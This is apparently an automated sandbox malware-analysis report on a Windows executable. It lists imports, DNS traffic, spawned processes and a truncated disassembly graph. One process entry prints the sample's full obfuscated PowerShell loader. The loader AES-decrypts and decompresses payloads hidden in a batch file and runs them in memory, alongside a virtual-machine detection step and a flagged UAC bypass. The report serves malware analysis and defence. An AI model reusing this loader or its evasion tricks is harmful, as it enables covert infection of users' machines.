                            USER32.dllShowWindow, MsgWaitForMultipleObjects, SetWindowPos, GetDC, GetWindowRect, DispatchMessageA, GetSystemMetrics, CallWindowProcA, SetWindowTextA, MessageBoxA, SendDlgItemMessageA, SendMessageA, GetDlgItem, DialogBoxIndirectParamA, GetWindowLongPtrA, SetWindowLongPtrA, SetForegroundWindow, ReleaseDC, EnableWindow, CharNextA, LoadStringA, CharPrevA, EndDialog, MessageBeep, ExitWindowsEx, SetDlgItemTextA, CharUpperA, GetDesktopWindow, PeekMessageA, GetDlgItemTextA
                            msvcrt.dll?terminate@@YAXXZ, _commode, _fmode, _acmdln, __C_specific_handler, memset, __setusermatherr, _ismbblead, _cexit, _exit, exit, __set_app_type, __getmainargs, _amsg_exit, _XcptFilter, memcpy_s, _vsnprintf, _initterm, memcpy
                            COMCTL32.dll
                            Cabinet.dll
                            VERSION.dllVerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA

                            Possible Origin

                            Language of compilation systemCountry where language is spokenMap
                            EnglishUnited States

                            Network Behavior

                            Network Port Distribution

                            UDP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Oct 8, 2024 00:29:33.295130014 CEST5355731162.159.36.2192.168.2.8
                            Oct 8, 2024 00:29:33.764405966 CEST6025653192.168.2.81.1.1.1
                            Oct 8, 2024 00:29:33.772066116 CEST53602561.1.1.1192.168.2.8

                            DNS Queries

                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                            Oct 8, 2024 00:29:33.764405966 CEST192.168.2.81.1.1.10xa91Standard query (0)198.187.3.20.in-addr.arpaPTR (Pointer record)IN (0x0001)false

                            DNS Answers

                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                            Oct 8, 2024 00:29:33.772066116 CEST1.1.1.1192.168.2.80xa91Name error (3)198.187.3.20.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false

                            Statistics

                            CPU Usage

                            Click to jump to process

                            Memory Usage

                            Click to jump to process

                            High Level Behavior Distribution

                            Click to dive into process behavior distribution

                            Behavior

                            Click to jump to process

                            System Behavior

                            General

                            Target ID:0
                            Start time:18:29:04
                            Start date:07/10/2024
                            Path:C:\Users\user\Desktop\XgKnAQpuPM.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Users\user\Desktop\XgKnAQpuPM.exe"
                            Imagebase:0x7ff776d10000
                            File size:3'571'712 bytes
                            MD5 hash:52C1ACDCBB715DD099648B26B98254E8
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:low
                            Has exited:true

                            General

                            Target ID:2
                            Start time:18:29:05
                            Start date:07/10/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c "vclib.bat"
                            Imagebase:0x7ff7d9ae0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:3
                            Start time:18:29:05
                            Start date:07/10/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6ee680000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:4
                            Start time:18:29:05
                            Start date:07/10/2024
                            Path:C:\Windows\System32\wbem\WMIC.exe
                            Wow64 process (32bit):false
                            Commandline:wmic diskdrive get Model
                            Imagebase:0x7ff615920000
                            File size:576'000 bytes
                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate
                            Has exited:true

                            General

                            Target ID:5
                            Start time:18:29:05
                            Start date:07/10/2024
                            Path:C:\Windows\System32\findstr.exe
                            Wow64 process (32bit):false
                            Commandline:findstr /i /c:"DADY HARDDISK" /c:"QEMU HARDDISK" /c:"WDS100T2B0A"
                            Imagebase:0x7ff6add80000
                            File size:36'352 bytes
                            MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate
                            Has exited:true

                            General

                            Target ID:6
                            Start time:18:29:07
                            Start date:07/10/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd.exe /c echo function FpxON($kXGHT){ $MjRuR=[System.Security.Cryptography.Aes]::Create(); $MjRuR.Mode=[System.Security.Cryptography.CipherMode]::CBC; $MjRuR.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $MjRuR.Key=[System.Convert]::FromBase64String('j3+l8MVXgSNKBboFFtDIY9ifLLQEhU8Shlqb9W611kU='); $MjRuR.IV=[System.Convert]::FromBase64String('C7Dlt1nshFAIyjxeP0iXIQ=='); $WVvmF=$MjRuR.CreateDecryptor(); $CVTyC=$WVvmF.TransformFinalBlock($kXGHT, 0, $kXGHT.Length); $WVvmF.Dispose(); $MjRuR.Dispose(); $CVTyC;}function ogptr($kXGHT){ Invoke-Expression '$bJDne=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$kXGHT);'.Replace('blck', ''); Invoke-Expression '$eTtPQ=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$gtTnv=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($bJDne, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $gtTnv.CopyTo($eTtPQ); $gtTnv.Dispose(); $bJDne.Dispose(); $eTtPQ.Dispose(); $eTtPQ.ToArray();}function VcYYT($kXGHT,$GOojW){ Invoke-Expression '$CHMLi=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$kXGHT);'.Replace('blck', ''); Invoke-Expression '$WMCoT=$CHMLi.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$WMCoT.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $GOojW)blck;'.Replace('blck', '');}$YesWH = 'C:\Users\user\AppData\Local\Temp\IXP000.TMP\vclib.bat';$host.UI.RawUI.WindowTitle = $YesWH;$lzgCG=[System.IO.File]::ReadAllText($YesWH).Split([Environment]::NewLine);foreach ($zwDbB in $lzgCG) { if ($zwDbB.StartsWith(':: ')) { $gGIZq=$zwDbB.Substring(3); break; }}$nciXK=[string[]]$gGIZq.Split('\');Invoke-Expression '$mmTjj=ogptr (FpxON (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($nciXK[0])));'.Replace('blck', '');Invoke-Expression '$gDpGZ=ogptr (FpxON (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($nciXK[1])));'.Replace('blck', '');VcYYT $mmTjj (,[string[]] (''));VcYYT $gDpGZ (,[string[]] (''));
                            Imagebase:0x7ff7d9ae0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:7
                            Start time:18:29:07
                            Start date:07/10/2024
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:powershell.exe -WindowStyle Hidden
                            Imagebase:0x7ff6cb6b0000
                            File size:452'608 bytes
                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000007.00000002.2185544424.000001C6916F8000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000007.00000002.2029388668.000001C68BEA1000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000007.00000002.2185544424.000001C691B00000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000007.00000002.2185544424.000001C690CF8000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:10
                            Start time:18:29:13
                            Start date:07/10/2024
                            Path:C:\Windows\System32\WerFault.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\WerFault.exe -u -p 3352 -s 1576
                            Imagebase:0x7ff6a78f0000
                            File size:570'736 bytes
                            MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:12
                            Start time:18:29:15
                            Start date:07/10/2024
                            Path:C:\Windows\System32\rundll32.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\"
                            Imagebase:0x7ff6b7a40000
                            File size:71'680 bytes
                            MD5 hash:EF3179D498793BF4234F708D3BE28633
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Disassembly

                            Reset < >

                              Execution Graph

                              Execution Coverage:24.2%
                              Dynamic/Decrypted Code Coverage:0%
                              Signature Coverage:39.7%
                              Total number of Nodes:879
                              Total number of Limit Nodes:23
                              execution_graph 2988 7ff776d155ba 2989 7ff776d1557c 2988->2989 2990 7ff776d155be 2988->2990 2991 7ff776d1563d lstrcmpA 2990->2991 2992 7ff776d15610 2990->2992 2991->2992 2993 7ff776d15694 2991->2993 2993->2992 2994 7ff776d156e8 CreateFileA 2993->2994 2994->2992 2996 7ff776d1571e 2994->2996 2995 7ff776d157a1 CreateFileA 2995->2992 2996->2992 2996->2995 2997 7ff776d15789 CharNextA 2996->2997 2998 7ff776d15772 CreateDirectoryA 2996->2998 2997->2996 2998->2997 2785 7ff776d12f7b CreateEventA SetEvent 2786 7ff776d151f8 7 API calls 2785->2786 2787 7ff776d12fba 2786->2787 2788 7ff776d130cb 2787->2788 2789 7ff776d151f8 7 API calls 2787->2789 2805 7ff776d12fbe 2787->2805 2815 7ff776d17320 2788->2815 2791 7ff776d13014 2789->2791 2793 7ff776d13026 CreateMutexA 2791->2793 2791->2805 2793->2788 2794 7ff776d1304a GetLastError 2793->2794 2794->2788 2807 7ff776d1305d 2794->2807 2795 7ff776d130f5 2798 7ff776d12034 16 API calls 2795->2798 2796 7ff776d13106 FindResourceExA 2799 7ff776d13127 LoadResource 2796->2799 2800 7ff776d1313c 2796->2800 2797 7ff776d186f0 7 API calls 2802 7ff776d131f8 2797->2802 2798->2805 2799->2800 2803 7ff776d13151 2800->2803 2804 7ff776d13145 #17 2800->2804 2801 7ff776d13072 2808 7ff776d130a9 CloseHandle 2801->2808 2803->2805 2806 7ff776d13162 2803->2806 2804->2803 2805->2797 2840 7ff776d13d34 GetVersionExA 2806->2840 2807->2788 2807->2801 2807->2808 2808->2805 2813 7ff776d17d28 4 API calls 2814 7ff776d131c3 2813->2814 2814->2805 2816 7ff776d177de 2815->2816 2828 7ff776d1736a 2815->2828 2817 7ff776d186f0 7 API calls 2816->2817 2818 7ff776d130d9 2817->2818 2818->2795 2818->2796 2818->2805 2819 7ff776d17442 2819->2816 2821 7ff776d1745f GetModuleFileNameA 2819->2821 2820 7ff776d17395 CharNextA 2820->2828 2822 7ff776d17487 2821->2822 2823 7ff776d17494 2821->2823 2824 7ff776d17fb8 2 API calls 2822->2824 2823->2816 2824->2823 2825 7ff776d1794b 2871 7ff776d188c8 RtlCaptureContext RtlLookupFunctionEntry 2825->2871 2828->2816 2828->2819 2828->2820 2828->2825 2829 7ff776d174b0 CharUpperA 2828->2829 2833 7ff776d17615 CharUpperA 2828->2833 2834 7ff776d17f48 IsDBCSLeadByte CharNextA 2828->2834 2835 7ff776d175be CompareStringA 2828->2835 2836 7ff776d17673 CharUpperA 2828->2836 2837 7ff776d1770a CharUpperA 2828->2837 2838 7ff776d17548 CharUpperA 2828->2838 2839 7ff776d17e08 CharPrevA 2828->2839 2829->2828 2830 7ff776d178e7 2829->2830 2831 7ff776d178f8 CloseHandle 2830->2831 2832 7ff776d17904 ExitProcess 2830->2832 2831->2832 2833->2828 2834->2828 2835->2828 2836->2828 2837->2828 2838->2828 2839->2828 2843 7ff776d13d91 2840->2843 2851 7ff776d13d8a 2840->2851 2841 7ff776d186f0 7 API calls 2842 7ff776d1316a 2841->2842 2842->2805 2852 7ff776d11258 2842->2852 2845 7ff776d13ef5 2843->2845 2843->2851 2877 7ff776d12898 2843->2877 2846 7ff776d13fae MessageBeep 2845->2846 2845->2851 2847 7ff776d13fc1 2846->2847 2848 7ff776d13fca MessageBoxA 2847->2848 2890 7ff776d18084 2847->2890 2848->2851 2851->2841 2853 7ff776d112a8 2852->2853 2854 7ff776d11421 2852->2854 2913 7ff776d11130 LoadLibraryA 2853->2913 2856 7ff776d186f0 7 API calls 2854->2856 2858 7ff776d11446 2856->2858 2858->2805 2858->2813 2859 7ff776d112b9 GetCurrentProcess OpenProcessToken 2859->2854 2860 7ff776d112e3 GetTokenInformation 2859->2860 2861 7ff776d1140c CloseHandle 2860->2861 2862 7ff776d1130c GetLastError 2860->2862 2861->2854 2862->2861 2863 7ff776d11321 LocalAlloc 2862->2863 2863->2861 2864 7ff776d1133e GetTokenInformation 2863->2864 2865 7ff776d11368 AllocateAndInitializeSid 2864->2865 2866 7ff776d113fd LocalFree 2864->2866 2865->2866 2869 7ff776d113b1 2865->2869 2866->2861 2867 7ff776d113ed FreeSid 2867->2866 2868 7ff776d113be EqualSid 2868->2869 2870 7ff776d113e2 2868->2870 2869->2867 2869->2868 2869->2870 2870->2867 2872 7ff776d18947 2871->2872 2873 7ff776d18905 RtlVirtualUnwind 2871->2873 2876 7ff776d18714 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2872->2876 2873->2872 2884 7ff776d12a9a 2877->2884 2888 7ff776d128d5 2877->2888 2878 7ff776d12aaa 2878->2845 2879 7ff776d12abf GlobalFree 2879->2878 2881 7ff776d12908 GetFileVersionInfoSizeA 2882 7ff776d12926 GlobalAlloc 2881->2882 2881->2888 2882->2878 2883 7ff776d12946 GlobalLock 2882->2883 2883->2884 2885 7ff776d12961 GetFileVersionInfoA 2883->2885 2884->2878 2884->2879 2886 7ff776d12985 VerQueryValueA 2885->2886 2885->2888 2887 7ff776d12a59 GlobalUnlock 2886->2887 2886->2888 2887->2888 2888->2881 2888->2884 2888->2887 2889 7ff776d12a3e GlobalUnlock 2888->2889 2894 7ff776d12644 2888->2894 2889->2879 2891 7ff776d180aa EnumResourceLanguagesA 2890->2891 2892 7ff776d1812d 2890->2892 2891->2892 2893 7ff776d180ef EnumResourceLanguagesA 2891->2893 2892->2848 2893->2892 2895 7ff776d12849 GetSystemDirectoryA 2894->2895 2896 7ff776d12683 CharUpperA CharNextA CharNextA 2894->2896 2900 7ff776d12843 2895->2900 2897 7ff776d1282f GetSystemDirectoryA 2896->2897 2898 7ff776d126c4 2896->2898 2897->2900 2899 7ff776d12819 GetWindowsDirectoryA 2898->2899 2903 7ff776d126ce 2898->2903 2899->2900 2901 7ff776d17e08 CharPrevA 2900->2901 2902 7ff776d1286a 2900->2902 2901->2902 2904 7ff776d186f0 7 API calls 2902->2904 2906 7ff776d17e08 CharPrevA 2903->2906 2905 7ff776d12879 2904->2905 2905->2888 2907 7ff776d1272d RegOpenKeyExA 2906->2907 2907->2900 2908 7ff776d12760 RegQueryValueExA 2907->2908 2909 7ff776d12793 2908->2909 2910 7ff776d12806 RegCloseKey 2908->2910 2911 7ff776d1279c ExpandEnvironmentStringsA 2909->2911 2912 7ff776d127ba 2909->2912 2910->2900 2911->2912 2912->2910 2914 7ff776d11229 2913->2914 2915 7ff776d11185 GetProcAddress 2913->2915 2918 7ff776d186f0 7 API calls 2914->2918 2916 7ff776d1121a FreeLibrary 2915->2916 2917 7ff776d111a3 AllocateAndInitializeSid 2915->2917 2916->2914 2917->2916 2919 7ff776d111ec FreeSid 2917->2919 2920 7ff776d11238 2918->2920 2919->2916 2920->2854 2920->2859 2999 7ff776d14b3b SendMessageA 3000 7ff776d1397e 3001 7ff776d1399a 3000->3001 3002 7ff776d13992 3000->3002 3004 7ff776d13a2c EndDialog 3001->3004 3006 7ff776d1399f 3001->3006 3002->3001 3003 7ff776d139ce GetDesktopWindow 3002->3003 3008 7ff776d14dc8 6 API calls 3003->3008 3004->3006 3010 7ff776d14e9f SetWindowPos 3008->3010 3011 7ff776d186f0 7 API calls 3010->3011 3012 7ff776d139e5 SetWindowTextA SetDlgItemTextA SetForegroundWindow 3011->3012 3012->3006 3013 7ff776d15f7e 3014 7ff776d151f8 7 API calls 3013->3014 3015 7ff776d15f9b FindResourceA LoadResource LockResource 3014->3015 3016 7ff776d15fec 3015->3016 3017 7ff776d161bf 3015->3017 3018 7ff776d15ff8 GetDlgItem ShowWindow GetDlgItem ShowWindow 3016->3018 3019 7ff776d16046 3016->3019 3018->3019 3020 7ff776d15e44 16 API calls 3019->3020 3021 7ff776d1604b 3020->3021 3022 7ff776d16059 #20 3021->3022 3024 7ff776d1604f 3021->3024 3023 7ff776d160c1 #22 3022->3023 3022->3024 3023->3024 3025 7ff776d16105 #23 3023->3025 3026 7ff776d16151 FreeResource 3024->3026 3027 7ff776d16165 3024->3027 3025->3024 3026->3027 3027->3017 3028 7ff776d161a1 SendMessageA 3027->3028 3028->3017 3029 7ff776d18400 __getmainargs 3030 7ff776d18282 3031 7ff776d182b5 CharNextA 3030->3031 3032 7ff776d1827a 3031->3032 3032->3030 3033 7ff776d15aca 3034 7ff776d15a9e 3033->3034 3035 7ff776d15ad0 GlobalFree 3033->3035 3036 7ff776d1874b RtlCaptureContext RtlLookupFunctionEntry 3037 7ff776d187d7 3036->3037 3038 7ff776d18795 RtlVirtualUnwind 3036->3038 3041 7ff776d18714 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 3037->3041 3038->3037 3042 7ff776d189ce 3043 7ff776d189df 3042->3043 3044 7ff776d18a02 3042->3044 3043->3044 3045 7ff776d189fb ?terminate@ 3043->3045 3045->3044 3046 7ff776d1868e 3047 7ff776d1869d _exit 3046->3047 3048 7ff776d186a6 3046->3048 3047->3048 3049 7ff776d186bb 3048->3049 3050 7ff776d186af _cexit 3048->3050 3050->3049 3051 7ff776d134ce 3052 7ff776d134eb CallWindowProcA 3051->3052 3053 7ff776d134dc 3051->3053 3054 7ff776d134e7 3052->3054 3053->3052 3053->3054 3055 7ff776d13a4e 3056 7ff776d13b49 3055->3056 3057 7ff776d13a73 3055->3057 3060 7ff776d13a94 3056->3060 3061 7ff776d13c5a EndDialog 3056->3061 3057->3056 3058 7ff776d13a88 3057->3058 3059 7ff776d13b51 GetDesktopWindow 3057->3059 3062 7ff776d13abb 3058->3062 3063 7ff776d13a8c 3058->3063 3064 7ff776d14dc8 14 API calls 3059->3064 3061->3060 3062->3060 3066 7ff776d13ac5 ResetEvent 3062->3066 3063->3060 3065 7ff776d13a9b TerminateThread 3063->3065 3067 7ff776d13b6f 3064->3067 3065->3061 3070 7ff776d13b03 3066->3070 3068 7ff776d13b78 GetDlgItem SendMessageA GetDlgItem SendMessageA 3067->3068 3069 7ff776d13bdb SetWindowTextA CreateThread 3067->3069 3068->3069 3069->3056 3069->3060 3071 7ff776d13b24 SetEvent 3070->3071 3072 7ff776d13b0c SetEvent 3070->3072 3073 7ff776d13c80 4 API calls 3071->3073 3072->3060 3073->3056 3074 7ff776d17b0f 3075 7ff776d17b5d 3074->3075 3076 7ff776d17e08 CharPrevA 3075->3076 3077 7ff776d17b95 CreateFileA 3076->3077 3078 7ff776d17bde WriteFile 3077->3078 3079 7ff776d17bd0 3077->3079 3080 7ff776d17c02 CloseHandle 3078->3080 3082 7ff776d186f0 7 API calls 3079->3082 3080->3079 3083 7ff776d17c35 3082->3083 3084 7ff776d14fcf 3085 7ff776d14fd4 3084->3085 3086 7ff776d14fdd MessageBoxA 3085->3086 3087 7ff776d18084 2 API calls 3085->3087 3089 7ff776d151ce 3086->3089 3087->3086 3090 7ff776d186f0 7 API calls 3089->3090 3091 7ff776d151dd 3090->3091 2922 7ff776d158d0 2929 7ff776d13c80 2922->2929 2925 7ff776d15902 WriteFile 2926 7ff776d158fa 2925->2926 2927 7ff776d15939 2925->2927 2927->2926 2928 7ff776d15965 SendDlgItemMessageA 2927->2928 2928->2926 2930 7ff776d13c8c MsgWaitForMultipleObjects 2929->2930 2931 7ff776d13cb4 PeekMessageA 2930->2931 2932 7ff776d13d25 2930->2932 2931->2930 2933 7ff776d13cd9 2931->2933 2932->2925 2932->2926 2933->2930 2933->2932 2934 7ff776d13ce7 DispatchMessageA 2933->2934 2935 7ff776d13cf8 PeekMessageA 2933->2935 2934->2935 2935->2933 2242 7ff776d12d97 2243 7ff776d12d9b GetModuleHandleW 2242->2243 2246 7ff776d12de9 2242->2246 2244 7ff776d12db3 GetProcAddress 2243->2244 2243->2246 2245 7ff776d12dce 2244->2245 2244->2246 2245->2246 2247 7ff776d12ea5 2246->2247 2259 7ff776d13214 2246->2259 2249 7ff776d12ebd 2247->2249 2250 7ff776d12eb1 CloseHandle 2247->2250 2250->2249 2254 7ff776d12e4f 2254->2247 2255 7ff776d12e8d ExitWindowsEx 2254->2255 2256 7ff776d12ea0 2254->2256 2255->2247 2326 7ff776d11bf4 GetCurrentProcess OpenProcessToken 2256->2326 2260 7ff776d13269 2259->2260 2261 7ff776d1323e 2259->2261 2347 7ff776d161d4 2260->2347 2263 7ff776d1325c 2261->2263 2332 7ff776d16294 2261->2332 2490 7ff776d14064 2263->2490 2265 7ff776d1326e 2293 7ff776d13362 2265->2293 2354 7ff776d168f0 2265->2354 2272 7ff776d13283 GetSystemDirectoryA 2396 7ff776d17e08 2272->2396 2275 7ff776d132ae LoadLibraryA 2276 7ff776d132c7 GetProcAddress 2275->2276 2277 7ff776d132fb FreeLibrary 2275->2277 2276->2277 2280 7ff776d132e2 DecryptFileA 2276->2280 2278 7ff776d133a5 SetCurrentDirectoryA 2277->2278 2279 7ff776d13316 2277->2279 2285 7ff776d133c3 2278->2285 2286 7ff776d1333f 2278->2286 2279->2278 2281 7ff776d13322 GetWindowsDirectoryA 2279->2281 2280->2277 2282 7ff776d1338c 2281->2282 2281->2286 2408 7ff776d16f14 2282->2408 2283 7ff776d13451 2288 7ff776d123c0 19 API calls 2283->2288 2283->2293 2295 7ff776d13479 2283->2295 2285->2283 2289 7ff776d1342d 2285->2289 2292 7ff776d133fd 2285->2292 2506 7ff776d17958 GetLastError 2286->2506 2288->2295 2434 7ff776d15f80 2289->2434 2291 7ff776d1349a 2291->2293 2296 7ff776d134b5 2291->2296 2429 7ff776d17d28 FindResourceA 2292->2429 2400 7ff776d186f0 2293->2400 2295->2291 2450 7ff776d141b4 2295->2450 2517 7ff776d14a54 2296->2517 2298 7ff776d13428 2298->2293 2507 7ff776d17984 2298->2507 2302 7ff776d163dc 2303 7ff776d16404 2302->2303 2304 7ff776d1643c LocalFree LocalFree 2303->2304 2305 7ff776d16419 SetFileAttributesA DeleteFileA 2303->2305 2311 7ff776d16463 2303->2311 2304->2303 2305->2304 2306 7ff776d16577 2307 7ff776d186f0 7 API calls 2306->2307 2309 7ff776d12e0e 2307->2309 2308 7ff776d1651d RegOpenKeyExA 2308->2306 2310 7ff776d1654e RegDeleteValueA RegCloseKey 2308->2310 2309->2247 2309->2254 2316 7ff776d123c0 2309->2316 2310->2306 2312 7ff776d164e4 SetCurrentDirectoryA 2311->2312 2313 7ff776d17ea0 4 API calls 2311->2313 2315 7ff776d16501 2311->2315 2759 7ff776d12034 2312->2759 2313->2312 2315->2306 2315->2308 2317 7ff776d12478 2316->2317 2318 7ff776d123d1 2316->2318 2777 7ff776d12234 GetWindowsDirectoryA 2317->2777 2320 7ff776d123db 2318->2320 2321 7ff776d12471 2318->2321 2323 7ff776d123eb RegOpenKeyExA 2320->2323 2324 7ff776d1246b 2320->2324 2774 7ff776d12308 RegOpenKeyExA 2321->2774 2323->2324 2325 7ff776d12420 RegQueryValueExA RegCloseKey 2323->2325 2324->2254 2325->2324 2327 7ff776d11c57 LookupPrivilegeValueA AdjustTokenPrivileges CloseHandle 2326->2327 2328 7ff776d11c34 2326->2328 2327->2328 2329 7ff776d11cd4 ExitWindowsEx 2327->2329 2330 7ff776d186f0 7 API calls 2328->2330 2329->2328 2331 7ff776d11d02 2330->2331 2331->2247 2527 7ff776d151f8 FindResourceA SizeofResource 2332->2527 2335 7ff776d162fb 2337 7ff776d151f8 7 API calls 2335->2337 2336 7ff776d162cd 2532 7ff776d17958 GetLastError 2336->2532 2338 7ff776d1630d 2337->2338 2340 7ff776d1634a lstrcmpA 2338->2340 2341 7ff776d16311 2338->2341 2342 7ff776d1637a 2340->2342 2343 7ff776d16364 LocalFree 2340->2343 2344 7ff776d1632f LocalFree 2341->2344 2345 7ff776d1639c LocalFree 2342->2345 2346 7ff776d1324b 2343->2346 2344->2346 2345->2346 2346->2260 2346->2263 2346->2293 2348 7ff776d151f8 7 API calls 2347->2348 2349 7ff776d161f1 2348->2349 2350 7ff776d161f6 2349->2350 2351 7ff776d151f8 7 API calls 2349->2351 2350->2265 2352 7ff776d16253 2351->2352 2353 7ff776d17984 13 API calls 2352->2353 2353->2350 2355 7ff776d151f8 7 API calls 2354->2355 2356 7ff776d16932 LocalAlloc 2355->2356 2357 7ff776d16982 2356->2357 2358 7ff776d16952 2356->2358 2359 7ff776d151f8 7 API calls 2357->2359 2557 7ff776d17958 GetLastError 2358->2557 2360 7ff776d16994 2359->2360 2362 7ff776d169d1 lstrcmpA LocalFree 2360->2362 2363 7ff776d16998 2360->2363 2364 7ff776d16a18 2362->2364 2365 7ff776d16a63 2362->2365 2367 7ff776d169b6 LocalFree 2363->2367 2370 7ff776d16710 37 API calls 2364->2370 2366 7ff776d16d40 2365->2366 2369 7ff776d16a7b GetTempPathA 2365->2369 2368 7ff776d17d28 4 API calls 2366->2368 2373 7ff776d16975 2367->2373 2368->2373 2372 7ff776d16a9e 2369->2372 2377 7ff776d16ad1 2369->2377 2370->2373 2371 7ff776d186f0 7 API calls 2374 7ff776d1327b 2371->2374 2533 7ff776d16710 2372->2533 2373->2371 2374->2272 2374->2293 2377->2373 2379 7ff776d16d07 GetWindowsDirectoryA 2377->2379 2380 7ff776d16b25 GetDriveTypeA 2377->2380 2382 7ff776d16f14 22 API calls 2379->2382 2383 7ff776d16b42 GetFileAttributesA 2380->2383 2394 7ff776d16b3d 2380->2394 2382->2377 2383->2394 2384 7ff776d16710 37 API calls 2384->2377 2385 7ff776d16b81 GetDiskFreeSpaceA 2387 7ff776d16baf MulDiv 2385->2387 2385->2394 2386 7ff776d12490 8 API calls 2386->2394 2387->2394 2388 7ff776d16c2e GetWindowsDirectoryA 2388->2394 2389 7ff776d17e08 CharPrevA 2391 7ff776d16c56 GetFileAttributesA 2389->2391 2390 7ff776d16f14 22 API calls 2390->2394 2392 7ff776d16c6c CreateDirectoryA 2391->2392 2391->2394 2392->2394 2393 7ff776d16c99 SetFileAttributesA 2393->2394 2394->2373 2394->2379 2394->2380 2394->2383 2394->2385 2394->2386 2394->2388 2394->2389 2394->2390 2394->2393 2395 7ff776d16710 37 API calls 2394->2395 2395->2394 2397 7ff776d17e28 2396->2397 2398 7ff776d17e4c CharPrevA 2397->2398 2399 7ff776d17e3a 2397->2399 2398->2399 2399->2275 2401 7ff776d186f9 2400->2401 2402 7ff776d12e07 2401->2402 2403 7ff776d18750 RtlCaptureContext RtlLookupFunctionEntry 2401->2403 2402->2302 2404 7ff776d187d7 2403->2404 2405 7ff776d18795 RtlVirtualUnwind 2403->2405 2588 7ff776d18714 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2404->2588 2405->2404 2409 7ff776d16f63 GetCurrentDirectoryA SetCurrentDirectoryA 2408->2409 2422 7ff776d16f5b 2408->2422 2410 7ff776d16fbb GetDiskFreeSpaceA 2409->2410 2411 7ff776d16f8e 2409->2411 2412 7ff776d171da memset 2410->2412 2413 7ff776d16ffc MulDiv 2410->2413 2589 7ff776d17958 GetLastError 2411->2589 2602 7ff776d17958 